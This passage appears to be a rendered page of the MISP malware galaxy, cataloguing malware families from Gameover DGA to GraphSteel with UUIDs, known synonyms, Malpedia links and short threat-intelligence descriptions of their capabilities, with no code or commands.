External references

Associated metadata

Metadata key	Value
type	[]

Gameover DGA

Internal MISP references

UUID c4afb7c6-cfba-40d7-aa79-a2829828ed92 which can be used as unique global reference for Gameover DGA in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.gameover_dga - webarchive

Associated metadata

Metadata key	Value
type	[]

Gameover P2P

Gameover ZeuS is a peer-to-peer botnet based on components from the earlier ZeuS trojan. According to a report by Symantec, Gameover Zeus has largely been used for banking fraud and distribution of the CryptoLocker ransomware. In early June 2014, the U.S. Department of Justice announced that an international inter-agency collaboration named Operation Tovar had succeeded in temporarily cutting communication between Gameover ZeuS and its command and control servers.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gameover P2P.

Known Synonyms
`GOZ`
`Gameover ZeuS`
`Mapp`
`ZeuS P2P`

Internal MISP references

UUID ffc8c386-e9d6-4889-afdf-ebf37621bc4f which can be used as unique global reference for Gameover P2P in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GamePlayerFramework

Internal MISP references

UUID 3efdc56a-793c-4fbb-99ea-a4d53899713a which can be used as unique global reference for GamePlayerFramework in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gamotrol

Internal MISP references

UUID 9664712b-81f1-4c52-ad4d-a657a120fded which can be used as unique global reference for Gamotrol in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.gamotrol - webarchive

Associated metadata

Metadata key	Value
type	[]

Gandcrab

GandCrab was a Ransomware-as-a-Service (RaaS) emerged in January 28, 2018, managed by a criminal organization known to be confident and vocal, while running a rapidly evolving ransomware campaign. Through their aggressive, albeit unusual, marketing strategies and constant recruitment of affiliates, they were able to globally distribute a high volume of their malware.

In a surprising announcement on May 31, 2019, the GandCrab’s operators posted on a dark web forum, announced the end of a little more than a year of ransomware operations, citing staggering profit figures. However, If there’s one thing that sets these threat actors apart from other groups, it is that they are unpredictable; so there is always the possibility that they might re-surface in one form or another.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gandcrab.

Known Synonyms
`GrandCrab`

Internal MISP references

UUID a8d83baa-cf2e-4329-92d7-06c8ccdeb275 which can be used as unique global reference for Gandcrab in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gasket

A backdoor used by Mespinoza ransomware gang to maintain access to a compromised network.

Internal MISP references

UUID 7ed854ba-c280-4d5b-9b84-c61dddd43f66 which can be used as unique global reference for Gasket in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gaudox

Gaudox is a http loader, written in C/C++. The author claims to have put much effort into making this bot efficient and stable. Its rootkit functionality hides it in Windows Explorer (32bit only).

Internal MISP references

UUID 591b2882-65ba-4629-9008-51ed3467510a which can be used as unique global reference for Gaudox in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gauss

Internal MISP references

UUID 5f8be453-8f73-47a2-9c9f-e8b9b02f5691 which can be used as unique global reference for Gauss in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gazavat

Gazavat (which is often tagged as Expiro by AV vendors) is a multi-functional backdoor that has code overlaps with the POS malware DMSniff. Functionality includes: - Loading other executables - Load hash cracking plugin - Load DMSniff plugin - Perform webinjection and webfakes - Form grabbing - Command execution - Download file from infected system - Convert infection into proxy - DDOS - Spreading and EXE infecting

Internal MISP references

UUID ac74e25e-6c73-416d-990f-2bcf0f19df2d which can be used as unique global reference for Gazavat in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gazer

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gazer.

Known Synonyms
`WhiteBear`

Internal MISP references

UUID 0a3047b3-6a38-48ff-8f9c-49a5c28e3ada which can be used as unique global reference for Gazer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GCleaner

Internal MISP references

UUID 874d6868-08fd-4b66-877d-fd2174f0d275 which can be used as unique global reference for GCleaner in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

gcman

Internal MISP references

UUID ed0586d1-4ff0-4d39-87c7-1414f600d16e which can be used as unique global reference for gcman in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gdrive

According to Unit 42, this is a .NET X64 malware that is capable of interaction with GoogleDrive, allowing an attacker to have victim information uploaded and payloads delivered.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gdrive.

Known Synonyms
`DoomDrive`
`GoogleDriveSucks`

Internal MISP references

UUID 61c90604-d0f6-437c-920a-f1d6d9f76c55 which can be used as unique global reference for Gdrive in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GearInformer

Internal MISP references

UUID 5e699f4d-9ff6-49dd-bc04-797f0ab2e128 which can be used as unique global reference for GearInformer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GEARSHIFT

According to FireEye, GEARSHIFT is a memory-only dropper for two keylogger DLLs. It is designed to replace a legitimate Fax Service DLL.

Internal MISP references

UUID 06d80b50-703a-4cf9-989e-b8b1bf71144a which can be used as unique global reference for GEARSHIFT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GEMCUTTER

According to FireEye, GEMCUTTER is used in a similar capacity as BACKBEND (downloader), but maintains persistence by creating a Windows registry run key. GEMCUTTER checks for the presence of the mutex MicrosoftGMMZJ to ensure only one copy of GEMCUTTER is executing. If the mutex doesn't exist, the malware creates it and continues execution; otherwise, the malware signals the MicrosoftGMMExit event.

Internal MISP references

UUID e46ae329-a619-4cfc-8059-af326c11ee79 which can be used as unique global reference for GEMCUTTER in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GeminiDuke

Internal MISP references

UUID f3a4863f-1acd-4476-a8c7-1d4c162426e0 which can be used as unique global reference for GeminiDuke in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Get2

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Get2.

Known Synonyms
`FRIENDSPEAK`
`GetandGo`

Internal MISP references

UUID f6aa0163-bde3-44a2-8acc-3e7a04cf167d which can be used as unique global reference for Get2 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GetMail

Internal MISP references

UUID 6f155c95-3090-4730-8d3b-0b246162a83a which can be used as unique global reference for GetMail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GetMyPass

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GetMyPass.

Known Synonyms
`getmypos`

Internal MISP references

UUID d77eacf7-090f-4cf6-a305-79a372241158 which can be used as unique global reference for GetMyPass in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

get_pwd

Internal MISP references

UUID a762023d-8d46-43a8-be01-3b2362963de0 which can be used as unique global reference for get_pwd in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gh0stBins

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gh0stBins.

Known Synonyms
`Gh0stBins RAT`

Internal MISP references

UUID 07ef4b03-c512-490c-905a-f7c2e3a47eba which can be used as unique global reference for Gh0stBins in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gh0stTimes

Custom RAT developed by the BlackTech actor, based on the Gh0st RAT.

Internal MISP references

UUID 9c89baf1-9639-4990-b218-14680170944f which can be used as unique global reference for Gh0stTimes in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GHAMBAR

According to Mandiant, GHAMBAR is a remote administration tool (RAT) that communicates with its C2 server using SOAP requests over HTTP. Its capabilities include filesystem manipulation, file upload and download, shell command execution, keylogging, screen capture, clipboard monitoring, and additional plugin execution.

Internal MISP references

UUID 4b9216e7-3a64-4b2e-97fd-54697d87cb72 which can be used as unique global reference for GHAMBAR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ghole

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghole.

Known Synonyms
`CoreImpact (Modified)`
`Gholee`

Internal MISP references

UUID ef4383f6-29fd-4b06-9a1f-b788567fd8fd which can be used as unique global reference for Ghole in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostEmperor

Internal MISP references

UUID 968e52d1-e1d1-499a-acdc-b21522646e28 which can be used as unique global reference for GhostEmperor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

win.ghostengine

Internal MISP references

UUID 2ead704c-d486-4127-b86a-5a409cc0f5d7 which can be used as unique global reference for win.ghostengine in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gh0stnet

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gh0stnet.

Known Synonyms
`Remosh`

Internal MISP references

UUID e1410684-c695-4c89-ae5f-80ced136afbd which can be used as unique global reference for Gh0stnet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostSocks

GhostSocks, a Golang-based proxy malware, was first advertised as a Malware-as-a-Service (MaaS) on Russian-speaking underground forums in October 2023. It uses back-connect socket secure internet protocol (SOCKS5) connections and is available for rent for US $100 per month. In February 2024, the author of Lumma Stealer released an update introducing the integration of proxying capabilities. This feature, developed in partnership with GhostSocks, allows the use of infected hosts as SOCKS5 proxies and is available to all subscribers who purchase the "Professional" or higher tier plan. This integration allows Lumma Stealer users to establish a network of residential IP addresses for various purposes, including credential checking, spam distribution, or as general-purpose proxies.

Internal MISP references

UUID 3b22582f-17fc-44d9-8218-f6c7b0ccf3c5 which can be used as unique global reference for GhostSocks in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostAdmin

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GhostAdmin.

Known Synonyms
`Ghost iBot`

Internal MISP references

UUID 6201c337-1599-4ced-be9e-651a624c20be which can be used as unique global reference for GhostAdmin in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostLocker

Internal MISP references

UUID 9b050f86-edad-40ed-9a93-b7c03444bfa5 which can be used as unique global reference for GhostLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ghost RAT

According to Security Ninja, Gh0st RAT (Remote Access Terminal) is a trojan “Remote Access Tool” used on Windows platforms, and has been used to hack into some of the most sensitive computer networks on Earth.

Below is a list of Gh0st RAT capabilities. Take full control of the remote screen on the infected bot. Provide real time as well as offline keystroke logging. Provide live feed of webcam, microphone of infected host. Download remote binaries on the infected remote host. Take control of remote shutdown and reboot of host. Disable infected computer remote pointer and keyboard input. Enter into shell of remote infected host with full control. Provide a list of all the active processes. Clear all existing SSDT of all existing hooks.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Ghost RAT.

Known Synonyms
`Farfli`
`Gh0st RAT`
`PCRat`

Internal MISP references

UUID 225fa6cf-dc9c-4b86-873b-cdf1d9dd3738 which can be used as unique global reference for Ghost RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GhostSecret

Internal MISP references

UUID 0b317327-6783-441f-8634-388599cbbff6 which can be used as unique global reference for GhostSecret in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gibberish

Ransomware.

Internal MISP references

UUID f561656c-19d1-4b07-a193-3293d053e774 which can be used as unique global reference for Gibberish in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Giffy

Internal MISP references

UUID 6ad51e4a-b44d-43c8-9f55-b9fe06a2c06d which can be used as unique global reference for Giffy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GIMMICK (Windows)

Internal MISP references

UUID 59e8424b-f2e6-4542-bbb3-0e62a4596a01 which can be used as unique global reference for GIMMICK (Windows) in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ginwui

Internal MISP references

UUID 7f768705-d852-4c66-a7e0-76fd5016d07f which can be used as unique global reference for Ginwui in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Ginzo Stealer

An information stealer written in .NET.

Internal MISP references

UUID 0edf6463-908a-4c3a-861d-70337c9f67bd which can be used as unique global reference for Ginzo Stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Glasses

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Glasses.

Known Synonyms
`Wordpress Bruteforcer`

Internal MISP references

UUID 1c27b1a3-ea2a-45d2-a982-12e1509aa4ad which can be used as unique global reference for Glasses in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.glasses - webarchive

Associated metadata

Metadata key	Value
type	[]

GlassRAT

Internal MISP references

UUID d9e6adf2-4f31-48df-a7ef-cf25d299f68c which can be used as unique global reference for GlassRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GlitchPOS

Internal MISP references

UUID d2e0cbfb-c647-48ec-84e2-ca2199cf7d03 which can be used as unique global reference for GlitchPOS in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GlobeImposter

GlobeImposter is a ransomware application which is mainly distributed via "blank slate" spam (the spam has no message content and an attached ZIP file), exploits, malicious advertising, fake updates, and repacked installers. GlobeImposter mimics the Globe ransomware family. This malware may prevent execution of Anti-Virus solutions and other OS related security features and may prevent system restoration.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GlobeImposter.

Known Synonyms
`Fake Globe`

Internal MISP references

UUID 73806c57-cef8-4f7b-a78b-7949ef83b2c2 which can be used as unique global reference for GlobeImposter in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Globe

Internal MISP references

UUID de8e204c-fb65-447e-92bd-200e1c39648c which can be used as unique global reference for Globe in MISP communities and other software using the MISP galaxy

External references

https://malpedia.caad.fkie.fraunhofer.de/details/win.globe_ransom - webarchive

Associated metadata

Metadata key	Value
type	[]

GlooxMail

Internal MISP references

UUID 18208674-fe8c-447f-9e1d-9ff9a64b2370 which can be used as unique global reference for GlooxMail in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Glupteba

Glupteba is a trojan horse malware that is one of the top ten malware variants of 2021. After infecting a system, the Glupteba malware can be used to deliver additional malware, steal user authentication information, and enroll the infected system in a cryptomining botnet.

Internal MISP references

UUID 978cfb82-5fe9-46d2-9607-9bcdfeaaa58c which can be used as unique global reference for Glupteba in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoBotKR

Internal MISP references

UUID 56060ca3-ee34-4df9-bcaa-70267d8440c1 which can be used as unique global reference for GoBotKR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

goCryptoLocker

Internal MISP references

UUID f93da83e-0c2f-4dc0-82c6-2fcc6339dcf2 which can be used as unique global reference for goCryptoLocker in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Godlike12

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Godlike12.

Known Synonyms
`GOSLU`

Internal MISP references

UUID f62ad36f-e274-4fdb-b71d-887f9cd9c215 which can be used as unique global reference for Godlike12 in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

goDoH

Proof of concept for data exfiltration via DoH, written in Go.

Internal MISP references

UUID b54b4238-550f-42a7-9e62-d1ad5e4d3904 which can be used as unique global reference for goDoH in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Godzilla Loader

Internal MISP references

UUID 9cfdc3ea-c838-4ac5-bff2-57c92ec24b48 which can be used as unique global reference for Godzilla Loader in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gofing

A file infector written in Go, discovered by Karsten Hahn in February 2022. According to Karsten, despite its internal naming, it is not polymorphic and the virus body is not encrypted. Gofing uses the Coldfire Golang malware development library.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gofing.

Known Synonyms
`Velocity Polymorphic Compression Malware`

Internal MISP references

UUID ba142293-2f22-46e3-8b8e-086f3571f14c which can be used as unique global reference for Gofing in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Goggles

Internal MISP references

UUID 7d89e8dc-4999-47e9-b497-b476e368a8d2 which can be used as unique global reference for Goggles in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoGoogle

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoGoogle.

Known Synonyms
`BossiTossi`

Internal MISP references

UUID 034a3db0-b53c-4ec1-9390-4b6f214e1233 which can be used as unique global reference for GoGoogle in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoGra

According to Symantec, a previously unseen backdoor that was deployed against a media organization in South Asia in November, 2023. GoGra is written in Go and uses the Microsoft Graph API to interact with a command-and-control (C&C) server hosted on Microsoft mail services.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoGra.

Known Synonyms
`Onedrivetools`

Internal MISP references

UUID feb79c31-cf88-4127-8ee9-dde4dfb99396 which can be used as unique global reference for GoGra in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GOLDBACKDOOR

Internal MISP references

UUID 54f5cf02-6fdc-43b4-af06-87af1a901264 which can be used as unique global reference for GOLDBACKDOOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldenEye

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoldenEye.

Known Synonyms
`Petya/Mischa`

Internal MISP references

UUID d7196f6a-757b-4124-ae28-f403e5d84fcb which can be used as unique global reference for GoldenEye in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldenHelper

Internal MISP references

UUID 1dd854b4-d8e6-438c-a0b1-6991b8b6ff92 which can be used as unique global reference for GoldenHelper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldenSpy

According securityweek, GoldenSpy, the malware was observed as part of a campaign that supposedly started in April 2020, but some of the identified samples suggest the threat has been around since at least December 2016.

One of the compromised organizations, a global technology vendor that conducts government business in the US, Australia and UK, and which recently opened offices in China, became infected after installing “Intelligent Tax,” a piece of software from the Golden Tax Department of Aisino Corporation, which a local bank required for paying local taxes.

Although it worked as advertised, the software was found to install a hidden backdoor to provide remote operators with the possibility to execute Windows commands or upload and run files.

Internal MISP references

UUID 86b8bd8d-19c5-4c7a-befd-0eb6297776bc which can be used as unique global reference for GoldenSpy in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldMax

Gold Max is a Golang written command and control backdoor used by the NOBELIUM threat actor group. It uses several different techniques to obfuscate its actions and evade detection. The malware writes an encrypted configuration file to disk, where the file name and AES-256 cipher keys are unique per implant and based on environmental variables and information about the network where it is running.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoldMax.

Known Synonyms
`SUNSHUTTLE`

Internal MISP references

UUID 9a3429d7-e4a8-43c5-8786-0b3a1c841a5f which can be used as unique global reference for GoldMax in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoldDragon

GoldDragon was a second-stage backdoor which established a permanent presence on the victim’s system once the first-stage, file-less, PowerShell-based attack leveraging steganography was executed. The initial attack was observed first in December 2017, when a Korean-language spear phishing campaing targeted organizations linked with Pyeongchang Winter Olympics 2018. GoldDragon was delivered once the attacker had gained an initial foothold in the targeted environment.

The malware was capable of a basic reconnaissance, data exfiltration and downloading of additional components from its C&C server.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GoldDragon.

Known Synonyms
`Lovexxx`

Internal MISP references

UUID 2297799c-f93c-4903-b9af-32b6b599912c which can be used as unique global reference for GoldDragon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Golroted

Internal MISP references

UUID 9cd98c61-0dfa-4af6-b334-65eb43bc8d9d which can be used as unique global reference for Golroted in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoMet

Internal MISP references

UUID 020a84b4-d717-48e6-9333-07c55523bc57 which can be used as unique global reference for GoMet in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gomorrah stealer

Gomorrah is a stealer with no or little obfuscation that appeared around March 2020. It is sold for about 150$ lifetime for v4 (originally 400$ for v3) or 100$ per month by its developer called "th3darkly / lucifer" (which is also the developer of CosaNostra botnet). The malware's main functionalities are stealing (passwords, cryptocurrency wallets) and loading of tasks and other payloads.

Internal MISP references

UUID ea9a9585-2a99-42b9-a724-bf7af82bb986 which can be used as unique global reference for Gomorrah stealer in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Goodor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Goodor.

Known Synonyms
`Fuerboos`

Internal MISP references

UUID 91b52a5f-420a-484b-8e1e-a91d402db6c5 which can be used as unique global reference for Goodor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GoogleDrive RAT

Internal MISP references

UUID d1298818-6425-49be-9764-9f119d964efd which can be used as unique global reference for GoogleDrive RAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GooPic Drooper

Internal MISP references

UUID 1ebb6107-f97b-45f6-ae81-a671ac437181 which can be used as unique global reference for GooPic Drooper in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GooseEgg

Internal MISP references

UUID 5d38cab2-ad33-467f-9ce9-27fea834fb13 which can be used as unique global reference for GooseEgg in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GootKit

Gootkit is a banking trojan consisting of an x86 loader and a payload embedding nodejs as well as a set of js scripts. The loader downloads the payload, stores it in registry and injects it in a copy of the loader process. The loader also contains two encrypted DLLs intended to be injected into each browser process launched in order to place the payload in man in the browser and allow it to apply the webinjects received from the command and control server on HTTPx exchanges. This allows Gootkit to intercept HTTPx requests and responses, steal their content or modify it according to the webinjects.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GootKit.

Known Synonyms
`Waldek`
`Xswkit`
`talalpek`

Internal MISP references

UUID 329efac7-922e-4d8b-90a9-4a87c3281753 which can be used as unique global reference for GootKit in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gophe

Internal MISP references

UUID fb2e42bf-6845-4eb3-9fe7-85a447762bce which can be used as unique global reference for Gophe in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gopuram

Internal MISP references

UUID 6dc4e71e-7372-4287-bdee-04da17a0d275 which can be used as unique global reference for Gopuram in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GOTROJ

Internal MISP references

UUID b4446bc0-41a1-4934-9fd0-a73b91589994 which can be used as unique global reference for GOTROJ in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GovRAT

Internal MISP references

UUID 9fbb5822-1660-4651-9f57-b6f83a881786 which can be used as unique global reference for GovRAT in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Gozi

2000 Ursnif aka Snifula 2006 Gozi v1.0, Gozi CRM, CRM, Papras 2010 Gozi v2.0, Gozi ISFB, ISFB, Pandemyia(*) -> 2010 Gozi Prinimalka -> Vawtrak/Neverquest

In 2006, Gozi v1.0 ('Gozi CRM' aka 'CRM') aka Papras was first observed. It was offered as a CaaS, known as 76Service. This first version of Gozi was developed by Nikita Kurmin, and he borrowed code from Ursnif aka Snifula, a spyware developed by Alexey Ivanov around 2000, and some other kits. Gozi v1.0 thus had a formgrabber module and often is classified as Ursnif aka Snifula.

In September 2010, the source code of a particular Gozi CRM dll version was leaked, which led to Vawtrak/Neverquest (in combination with Pony) via Gozi Prinimalka (a slightly modified Gozi v1.0) and Gozi v2.0 (aka 'Gozi ISFB' aka 'ISFB' aka Pandemyia). This version came with a webinject module.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Gozi.

Known Synonyms
`CRM`
`Gozi CRM`
`Papras`
`Snifula`
`Ursnif`

Internal MISP references

UUID 75329c9e-a218-4299-87b2-8f667cd9e40c which can be used as unique global reference for Gozi in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GPCode

Internal MISP references

UUID 127c3d76-6323-4363-93e0-cd06ade0dd52 which can be used as unique global reference for GPCode in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GrabBot

Internal MISP references

UUID 0092b005-b032-4e34-9c7e-7dd0e71a85fb which can be used as unique global reference for GrabBot in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Graftor

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular Graftor.

Known Synonyms
`MewsSpy`

Internal MISP references

UUID 94b942e2-cc29-447b-97e2-e496cbf2aadf which can be used as unique global reference for Graftor in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Grager

Grager is a backdoor deployed against three organizations in Taiwan, Hong Kong, and Vietnam in April 2024. Analysis of this backdoor revealed that it uses the Graph API to communicate with a command and control (C&C) server hosted on Microsoft OneDrive. The backdoor decrypts a client ID and refresh token for OneDrive from a blob contained within its file body. It supports the following commands:

Retrieve machine information, including machine name, user, IP address, and machine architecture
Download or upload a file
Execute a file
Gather file system information, including available drives, their sizes, and types of drives

Internal MISP references

UUID a5cf8d64-262f-47fd-a48b-1c2bcfa4f641 which can be used as unique global reference for Grager in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GRAMDOOR

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GRAMDOOR.

Known Synonyms
`Small Sieve`

Internal MISP references

UUID 0dfa69cc-cc70-4944-af42-7e1f923e6b6b which can be used as unique global reference for GRAMDOOR in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Grandoreiro

According to ESET Research, Grandoreiro is a Latin American banking trojan targeting Brazil, Mexico, Spain and Peru. As such, it shows unusual effort by its authors to evade detection and emulation, and progress towards a modular architecture.

Internal MISP references

UUID c62219e2-74a3-49c2-a33d-0789b820c467 which can be used as unique global reference for Grandoreiro in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GrandSteal

Internal MISP references

UUID 626de4fc-cfa4-4fbc-ab35-4c9ab9fdec14 which can be used as unique global reference for GrandSteal in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GraphDrop

PANW Unit 42 describes this malware as capable of up and downloading files as well as loading additional shellcode payloads into selected target processes. It uses the Microsoft Graph API and Dropbox API as C&C channel.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GraphDrop.

Known Synonyms
`GraphicalProton`
`SPICYBEAT`

Internal MISP references

UUID 15d96a22-118b-4933-8258-e9cc4dd9719a which can be used as unique global reference for GraphDrop in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GraphicalNeutrino

This loader abuses the benign service Notion for data exchange.

Synonyms

"synonyms" in the meta part typically refer to alternate names or labels that are associated with a particular GraphicalNeutrino.

Known Synonyms
`SNOWYAMBER`

Internal MISP references

UUID cb92a200-b4f0-4983-8d5d-6bf529b66da9 which can be used as unique global reference for GraphicalNeutrino in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Graphican

According to Symantec, Graphican is an evolution of the known APT15 backdoor Ketrican, which itself was based on a previous malware - BS2005 - also used by APT15. Graphican has the same basic functionality as Ketrican, with the difference between them being Graphican’s use of the Microsoft Graph API and OneDrive to obtain its command-and-control (C&C) infrastructure.

Internal MISP references

UUID ccaefb44-1cbb-4f91-bd2d-ea5735446d1d which can be used as unique global reference for Graphican in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Graphiron

Downloader / information stealer used by UAC-0056, observed since at least October 2022.

Internal MISP references

UUID 968e330d-281e-4647-99fd-d9903aa6bbba which can be used as unique global reference for Graphiron in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Graphite

Trellix describes Graphite as a malware using the Microsoft Graph API and OneDrive for C&C. It was found being deployed in-memory only and served as a downloader for Empire.

Internal MISP references

UUID 8ecc6605-eed1-416c-bc8b-0dc1147d3c2b which can be used as unique global reference for Graphite in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

Graphon

Internal MISP references

UUID 9ab9e88f-b365-4d58-af52-e9d19ab00348 which can be used as unique global reference for Graphon in MISP communities and other software using the MISP galaxy

External references

Associated metadata

Metadata key	Value
type	[]

GraphSteel

This malware was seen during the cyberattacks on Ukrainian state organizations. It is one of two used backdoors written in Go and attributed to UAC-0056 (SaintBear, UNC2589, TA471).

Internal MISP references

